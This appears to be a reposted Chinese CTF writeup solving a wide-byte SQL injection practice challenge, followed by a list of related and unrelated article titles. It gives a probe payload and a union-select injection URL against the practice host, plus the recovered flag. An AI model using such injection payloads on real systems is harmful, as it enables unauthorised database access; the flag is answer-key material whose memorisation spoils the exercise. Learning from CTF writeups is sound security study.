CTF练习平台sql注入测试writeup
来源:互联网 发布:php saas平台架构设计 编辑:程序博客网 时间:2024/05/17 22:59
练习网址http://103.238.227.13:10083/
页面截图
由以上提示我们可以看出查询key表,id=1的string字段,为此我们可以从最基本的注入开始尝试
发现并不报错,想到了宽字节注入,并且可以验证一下:
http://103.238.227.13:10083/index.php
?id=%df%27
输出结果如下
说明存在注入漏洞,我们可根据题的提示用宽字节注入练习下,如果不懂宽字节注入的可以看一下这个链接学习http://blog.csdn.net/helloweb2014/article/details/60757497
注入如下
http://103.238.227.13:10083/index.php
?id=-1%a1%27 union select 1,string from `key`%23
输出结果如图:
得到key为
54f3320dc261f313ba712eb3f13a1f6d阅读全文
0 0
- CTF练习平台sql注入测试writeup
- CTF-练习平台 WriteUp
- CTF/CTF练习平台 --SQL注入测试【sql宽字节注入与#,%23】
- bugku CTF练习平台writeup
- CTF-练习平台writeup【持续更新】
- bugku CTF-练习平台 部分writeup
- CTF练习平台 JavaScript ”点击一万次“ writeup
- CTF-练习平台 Web writeup By Assassin [暂时完结]
- 实验吧 ctf 题目简单的sql注入2writeup
- CTF/CTF练习平台-login1【sql约束攻击】
- 南邮CTF平台writeup:Web(一)
- CTF/CTF练习平台-XSS【xss注入及js unicode编码及innerHTML】
- bugku ctf平台之sql注入1 write up
- SQL注入练习平台sqli-labs
- CTF web总结--sql注入
- bugkuctf练习平台reverse部分writeup
- CUIT CTF WriteUp-Code100
- 360 CTF Writeup
- ZJOI2007仓库建设
- 关于FTP主动模式与被动模式的一点理解
- 省选专练SCOI2007修车
- 简易波形显示器——单片机实验结课成果
- html 提交表单,但不跳转页面处理返回值
- CTF练习平台sql注入测试writeup
- [CSAPP]计算机系统漫游
- Matlab如何打包成jar并给java使用(混合编程)
- 基于Tensorflow的android手写数字识别
- JavaScript toFixed() 方法
- 模板学习笔记
- Android 7.1 GUI系统-窗口管理WMS-窗口属性(二)
- [生而为人-思考] Knowledge Cooking -6th 分享会记录
- 51Nod 1264 线段相交